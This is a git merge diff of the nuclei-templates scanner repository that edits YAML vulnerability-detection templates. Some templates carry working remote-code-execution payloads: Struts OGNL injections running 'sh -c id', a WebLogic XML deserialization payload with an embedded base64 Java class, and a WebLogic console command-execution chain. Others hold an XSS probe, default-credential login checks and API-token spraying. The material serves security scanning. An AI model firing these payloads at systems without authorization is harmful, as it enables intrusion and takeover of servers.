Merge pull request #102 from projectdiscovery/master

Updation
2021-10-21 22:22:12 +05:30 · 2021-10-21 22:22:12 +05:30 · 1eb0ea4ece
parent 7cbafb05a4 709f6edbf7
commit 1eb0ea4ece
113 changed files with 357 additions and 111 deletions
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@ -14,8 +14,3 @@ tags:
 # files is a list of files to ignore template execution
 # unless asked for by the user.
 files:
  - "token-spray/"
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@ -11,25 +11,19 @@ info:
 requests:
  - raw:
      - |
-        GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+        GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en
      - |
-        GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+        GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en
      - |
-        GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+        GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Accept: */*
        Accept-Language: en
    payloads:
      params:
@ -40,11 +34,12 @@ requests:
    matchers-condition: and
    matchers:
      - type: status
        condition: or
        status:
          - 200
          - 400
-        condition: or
+
      - type: regex
        part: body
        regex:
          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
        part: body
--- a/cves/2016/CVE-2016-1000143.yaml
+++ b/cves/2016/CVE-2016-1000143.yaml
@ -0,0 +1,37 @@
 id: CVE-2016-1000143
 info:
  name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS)
  author: daffainfo
  severity: medium
  description: Reflected XSS in wordpress plugin photoxhibit v2.1.8
  reference:
    - http://www.vapidlabs.com/wp/wp_advisory.php?v=780
    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143
  tags: cve,cve2016,wordpress,wp-plugin,xss
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.10
    cve-id: CVE-2016-1000143
    cwe-id: CWE-79
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'
        part: body
      - type: word
        part: header
        words:
          - text/html
      - type: status
        status:
          - 200
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@ -91,15 +91,16 @@ requests:
        - webviewer
        - welcome
    attack: sniper
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        condition: and
        words:
          - "environment variable"
          - "display library search paths"
        condition: and
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@ -22,14 +22,16 @@ requests:
    payloads:
      ids: helpers/wordlists/numbers.txt
-    attack: sniper
+
    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "<title>Dashboard</title>"
--- a/cves/2019/CVE-2019-2729.yaml
+++ b/cves/2019/CVE-2019-2729.yaml
@ -0,0 +1,32 @@
 id: CVE-2019-2729
 info:
  name: Oracle WebLogic Server Administration Console Handle RCE
  author: igibanez
  severity: critical
  description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-2729
  tags: cve,cve2019,oracle,rce,weblogic
 requests:
  - raw:
      - |
        POST /wls-wsat/CoordinatorPortType HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class="sun.misc.BASE64Decoder"><void method="decodeBuffer" id="byte_arr"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class="org.mozilla.classfile.DefiningClassLoader"><void method="defineClass"><string>ResultBaseExec</string><object idref="byte_arr"></object><void method="newInstance"><void method="do_exec" id="result"><string>echo${IFS}9272-9102-EVC|rev</string></void></void></void></void><void class="java.lang.Thread" method="currentThread"><void method="getCurrentWork" id="current_work"><void method="getClass"><void method="getDeclaredField"><string>connectionHandler</string><void method="setAccessible"><boolean>true</boolean></void><void method="get"><object idref="current_work"></object><void method="getServletRequest"><void method="getResponse"><void method="getServletOutputStream"><void method="writeStream"><object class="weblogic.xml.util.StringInputStream"><object idref="result"></object></object></void><void method="flush"/></void><void method="getWriter"><void method="write"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "CVE-2019-2729"
      - type: status
        status:
          - 200
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@ -28,8 +28,7 @@ requests:
      - |
        POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
        Host: {{Hostname}}
-        cmd: §exec§
+        cmd: {{exec}}
        Connection: close
        Content-Type: application/x-www-form-urlencoded; charset=utf-8
        _nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@ -41,12 +40,12 @@ requests:
    matchers-condition: and
    matchers:
      - type: regex
        condition: or
        regex:
          - "root:.*:0:0:"
          - "\\[(font|extension|file)s\\]"
        condition: or
        part: body
      - type: status
        status:
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@ -31,11 +31,12 @@ requests:
      command:
        - "systeminfo"  # Windows
        - "lsb_release -a"  # Linux
    attack: sniper
    matchers-condition: and
    matchers:
      - type: regex
        condition: or
        regex:
          - "OS Name:.*Microsoft Windows"
          - "Distributor ID:"
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@ -22,6 +22,8 @@ requests:
    path:
      - "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
      - "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
    skip-variables-check: true
    matchers-condition: and
    matchers:
      - type: status
--- a/cves/2021/CVE-2021-33044.yaml
+++ b/cves/2021/CVE-2021-33044.yaml
@ -40,7 +40,7 @@ requests:
      - type: word
        part: body
        words:
-          - "true"
+          - "\"result\":true"
          - "id"
          - "params"
          - "session"
--- a/cves/2021/CVE-2021-41773.yaml
+++ b/cves/2021/CVE-2021-41773.yaml
@ -31,7 +31,7 @@ requests:
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
-        echo Content-Type: text/plain; echo; echo 37714-1202-EVC | rev
+        echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev
    matchers-condition: or
    matchers:
@ -44,4 +44,4 @@ requests:
      - type: word
        name: RCE
        words:
-          - "CVE-2021-41773"
+          - "CVE-2021-41773-POC"
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@ -1,4 +1,5 @@
 id: grafana-default-login
 info:
  name: Grafana Default Login
  author: pdteam
@ -26,7 +27,6 @@ requests:
      username:
        - admin
        - admin
      password:
        - prom-operator
        - admin
@ -35,15 +35,13 @@ requests:
    matchers:
      - type: word
        words:
-          - grafana_session
+          - "grafana_session" # Login cookie
        part: header
        # Check for 'grafana_session' cookie on valid login in the response header.
      - type: word
        words:
          - Logged in
        part: body
-        # Check for valid string on valid login.
+        words:
          - "Logged in" # Logged in keyword
      - type: status
        status:
--- a/default-logins/hp/hp-switch-default-login.yaml
+++ b/default-logins/hp/hp-switch-default-login.yaml
@ -20,15 +20,13 @@ requests:
      username:
        - admin
    attack: sniper
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - '"redirect": "/htdocs/pages/main/main.lsp"'
          - '"error": ""'
        condition: and
      - type: status
        status:
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml
+++ b/default-logins/idemia/idemia-biometrics-default-login.yaml
@ -18,22 +18,21 @@ requests:
    payloads:
      password:
-        - 12345
+        - "12345"
    attack: sniper
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "session_id="
          - "resource"
        condition: and
      - type: word
        words:
          - "Invalid Password"
        part: body
        negative: true
        words:
          - "Invalid Password"
      - type: status
        status:
--- a/exposed-panels/samsung-printer-detect.yaml
+++ b/exposed-panels/samsung-printer-detect.yaml
@ -0,0 +1,24 @@
 id: samsung-printer-detect
 info:
  name: SAMSUNG Printer Detection
  author: pussycat0x
  severity: info
  tags: iot,panel
  metadata:
    fofa-dork: 'app="SAMSUNG-Printer"'
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/sws/index.html"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '<title> SyncThru Web Service </title>'
      - type: status
        status:
          - 200
--- a/exposures/configs/github-workflows-disclosure.yaml
+++ b/exposures/configs/github-workflows-disclosure.yaml
@ -36,6 +36,7 @@ requests:
      - "{{BaseURL}}/.github/workflows/ci-daily.yml"
      - "{{BaseURL}}/.github/workflows/ci-issues.yml"
      - "{{BaseURL}}/.github/workflows/smoosh-status.yml"
      - "{{BaseURL}}/.github/workflows/snyk.yml"
    matchers-condition: and
    matchers:
--- a/exposures/configs/gruntfile-exposure.yaml
+++ b/exposures/configs/gruntfile-exposure.yaml
@ -0,0 +1,29 @@
 id: gruntfile-exposure
 info:
  name: Gruntfile Exposure
  author: sbani
  severity: info
  reference: https://gruntjs.com/sample-gruntfile
  tags: config,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/Gruntfile.js"
      - "{{BaseURL}}/Gruntfile.coffee"
    redirects: true
    max-redirects: 2
    matchers-condition: and
    matchers:
      - type: word
        part: body
        condition: and
        words:
          - "module.exports"
          - "grunt"
      - type: status
        status:
          - 200
--- a/exposures/configs/jetbrains-datasources.yaml
+++ b/exposures/configs/jetbrains-datasources.yaml
@ -0,0 +1,24 @@
 id: jetbrains-datasource
 info:
  name: Jetbrains IDE DataSources exposure
  author: FlorianMaak
  severity: info
  description: Contains uuid of datasource to retrieve via .idea/dataSources/{uuid}.xml to expose database structure.
  tags: config,exposure
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/.idea/dataSources.xml"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DataSourceManagerImpl"
        part: body
      - type: status
        status:
          - 200
--- a/exposures/configs/symfony-security-config.yaml
+++ b/exposures/configs/symfony-security-config.yaml
@ -0,0 +1,30 @@
 id: symfony-security-config
 info:
  name: Symfony Security Configuration Exposure
  author: dahse89
  severity: info
  reference:
    - https://symfony2-document.readthedocs.io/en/latest/book/security.html
    - https://symfony.com/doc/current/reference/configuration/security.html
  tags: config,exposure,symfony
 requests:
  - method: GET
    path:
      - "{{BaseURL}}/config/packages/security.yaml"
      - "{{BaseURL}}/app/config/security.yml"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "security:"
          - "firewalls:"
          - "access_control:"
        condition: and
        part: body
--- a/exposures/logs/access-log.yaml
+++ b/exposures/logs/access-log.yaml
@ -10,6 +10,9 @@ requests:
  - method: GET
    path:
      - "{{BaseURL}}/access.log"
      - "{{BaseURL}}/log/access.log"
      - "{{BaseURL}}/logs/access.log"
      - "{{BaseURL}}/application/logs/access.log"
    matchers-condition: and
    matchers:
--- a/exposures/logs/error-logs.yaml
+++ b/exposures/logs/error-logs.yaml
@ -45,6 +45,8 @@ requests:
          - "script headers"
          - "Broken pipe"
          - "Array"
          - "Exception"
          - "Fatal"
        condition: or
      - type: word
--- a/exposures/logs/php-warning.yaml
+++ b/exposures/logs/php-warning.yaml
@ -1,25 +0,0 @@
 id: php-warning
 info:
  name: PHP warning
  author: dhiyaneshDK
  severity: low
  reference: https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22
  tags: exposure,php,debug
 requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '(?m)^<title>([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$'
      - type: status
        status:
          - 500
          - 503
        condition: or
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@ -23,17 +23,17 @@ requests:
    payloads:
      path: helpers/wordlists/adminer-paths.txt
    attack: sniper
    threads: 50
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "- Adminer</title>"
-          - "partial(verifyVersion, "
+          - "partial(verifyVersion"
-        condition: and
+
      - type: status
        status:
          - 200
--- a/fuzzing/mdb-database-file.yaml
+++ b/fuzzing/mdb-database-file.yaml
@ -14,12 +14,10 @@ requests:
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept-Language: en-US,en;q=0.9
        Connection: close
    payloads:
      mdbPaths: helpers/wordlists/mdb-paths.txt
    attack: sniper
    threads: 50
    max-size: 500 # Size in bytes - Max Size to read from server response
    stop-at-first-match: true
--- a/fuzzing/prestashop-module-fuzz.yaml
+++ b/fuzzing/prestashop-module-fuzz.yaml
@ -1,4 +1,5 @@
 id: prestashop-module-fuzz
 info:
  name: Prestashop Modules Enumeration
  author: meme-lord
@ -16,19 +17,18 @@ requests:
    payloads:
      path: helpers/wordlists/prestashop-modules.txt
    attack: sniper
    threads: 50
    threads: 50
    matchers-condition: and
    matchers:
      - type: word
        condition: and
        words:
          - "<module>"
          - "<name>"
          - "<displayName>"
          - "<is_configurable>"
          - "</module>"
        condition: and
      - type: status
        status:
--- a/fuzzing/wordpress-plugins-detect.yaml
+++ b/fuzzing/wordpress-plugins-detect.yaml
@ -1,4 +1,5 @@
 id: wordpress-plugins-detect
 info:
  name: WordPress Plugins Detection
  author: 0xcrypto
@ -13,11 +14,8 @@ requests:
    payloads:
      pluginSlug: helpers/wordlists/wordpress-plugins.txt
    attack: sniper
    threads: 50
    redirects: true
    max-redirects: 1
    threads: 50
    matchers-condition: and
    matchers:
      - type: status
--- a/fuzzing/wordpress-themes-detect.yaml
+++ b/fuzzing/wordpress-themes-detect.yaml
@ -1,4 +1,5 @@
 id: wordpress-themes-detect
 info:
  name: WordPress Theme Detection
  author: 0xcrypto
@ -13,11 +14,8 @@ requests:
    payloads:
      themeSlug: helpers/wordlists/wordpress-themes.txt
    attack: sniper
    threads: 50
    redirects: true
    max-redirects: 1
    threads: 50
    matchers-condition: and
    matchers:
      - type: status
--- a/miscellaneous/ntlm-directories.yaml
+++ b/miscellaneous/ntlm-directories.yaml
@ -14,6 +14,7 @@ requests:
        Host: {{Hostname}}
        Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
    threads: 50
    payloads:
      path:
        - /
@ -63,9 +64,6 @@ requests:
        - /webticket/webticketservice.svcabs/
        - /adfs/services/trust/2005/windowstransport
    attack: sniper
    threads: 50
    matchers-condition: and
    matchers:
      - type: dsl
--- a/misconfiguration/php-errors.yaml
+++ b/misconfiguration/php-errors.yaml
@ -2,7 +2,10 @@ id: php-errors
 info:
  name: PHP errors
-  author: w4cky_,geeknik
+  author: w4cky_,geeknik,dhiyaneshDK
  reference:
    - https://www.shodan.io/search?query=%22Fatal+error%22
    - https://www.shodan.io/search?query=http.title%3A%22PHP+warning%22
  severity: info
  tags: debug,php
@ -20,6 +23,7 @@ requests:
          - '(?i)MySQL server version for the right syntax to use near'
          - '(?i)MySQL cannot create a temporary file'
          - '(?i)PHP (Warning|Error)'
          - '(?m)^<title>([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$'
          - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)'
          - '(?i)failed to open stream\:'
          - '(?i)SAFE MODE Restriction in effect'
--- a/network/detect-jabber-xmpp.yaml
+++ b/network/detect-jabber-xmpp.yaml
@ -0,0 +1,24 @@
 id: detect-jabber-xmpp
 info:
  name: Detects Jabber XMPP Instance
  author: geeknik
  severity: info
  description: Jabber is the original name of the Extensible Messaging and Presence Protocol (XMPP), the open technology for instant messaging and presence.
  reference: https://datatracker.ietf.org/doc/html/rfc6120
  tags: network,jabber,xmpp
 network:
  - inputs:
      - data: "a\n"
    host:
      - "{{Hostname}}"
      - "{{Hostname}}:5222"
    matchers:
      - type: word
        words:
          - "stream:stream xmlns:stream"
          - "stream:error xmlns:stream"
        condition: or
--- a/technologies/aws/aws-bucket-service.yaml
+++ b/technologies/aws/aws-bucket-service.yaml
@ -18,7 +18,7 @@ requests:
          - contains(tolower(all_headers), 'x-amz-bucket')
          - contains(tolower(all_headers), 'x-amz-request')
          - contains(tolower(all_headers), 'x-amz-id')
-          - contains(tolower(all_headers), 'AmazonS3')
+          - contains(tolower(all_headers), 'amazons3')
        part: header
        condition: or
--- a/token-spray/README.md
+++ b/token-spray/README.md
@ -1,15 +1,19 @@
 ## About
 This directory holds templates that have static API URL endpoints. Use these to test an API token against many API service endpoints. By providing token input using flag, Nuclei will test the token against all known API endpoints within the API templates, and return any successful results. By incorporating API checks as Nuclei Templates, users can test API keys that have no context (i.e., API keys that do not indicate for which API endpoint they are meant).
 ## Usage
 You do not need to specify an input URL to test a token against these API endpoints, as the API endpoints have static URLs. However, Nuclei requires an input (specified via `-u` for individual URLs or `-l` for a file containing URLs). Because of this requirement, we simply pass in `-u "null"`. Each template in the `token-spray` directory assumes the input API token will be provided using CLI `var` flag.
-```bash
+token-spray are **self-contained** template and does not requires URLs as input as the API endpoints have static URLs predefined in the template. Each template in the `token-spray` directory assumes the input API token/s will be provided using CLI `var` flag.
 # Run Nuclei specifying all the api templates:
-nuclei -u null -t token-spray/ -var token=thisIsMySecretTokenThatIWantToTest
+```console
 # Running token-spray templates against a single token to test
 nuclei -t token-spray/ -var token=random-token-to-test
 # Running token-spray templates against a file containing multiple new line delimited tokens
 nuclei -t token-spray/ -var token=file_with_tokens.txt
 ```
 ## Credits
 These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
 These API testing templates were inspired by the [streaak/keyhacks](https://github.com/streaak/keyhacks) repository. The Bishop Fox [Continuous Attack Surface Testing (CAST)](https://www.bishopfox.com/continuous-attack-surface-testing/how-cast-works/) team created additional API templates for testing API keys uncovered during investigations. You are welcome to add new templates based on the existing format to cover more APIs.
--- a/token-spray/asana.yaml
+++ b/token-spray/asana.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,asana
 self-contained: true
 requests:
  - method: GET
    path:
@ -16,6 +17,6 @@ requests:
    matchers:
      - type: status
        negative: true
        status:
          - 401
        negative: true
--- a/token-spray/bingmaps.yaml
+++ b/token-spray/bingmaps.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,bing,maps,bingmaps
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/bitly.yaml
+++ b/token-spray/bitly.yaml
@ -7,6 +7,7 @@ info:
  severity: info
  tags: token-spray,bitly
 self-contained: true
 requests:
  - method: GET
    path:
--- a/token-spray/buildkite.yaml
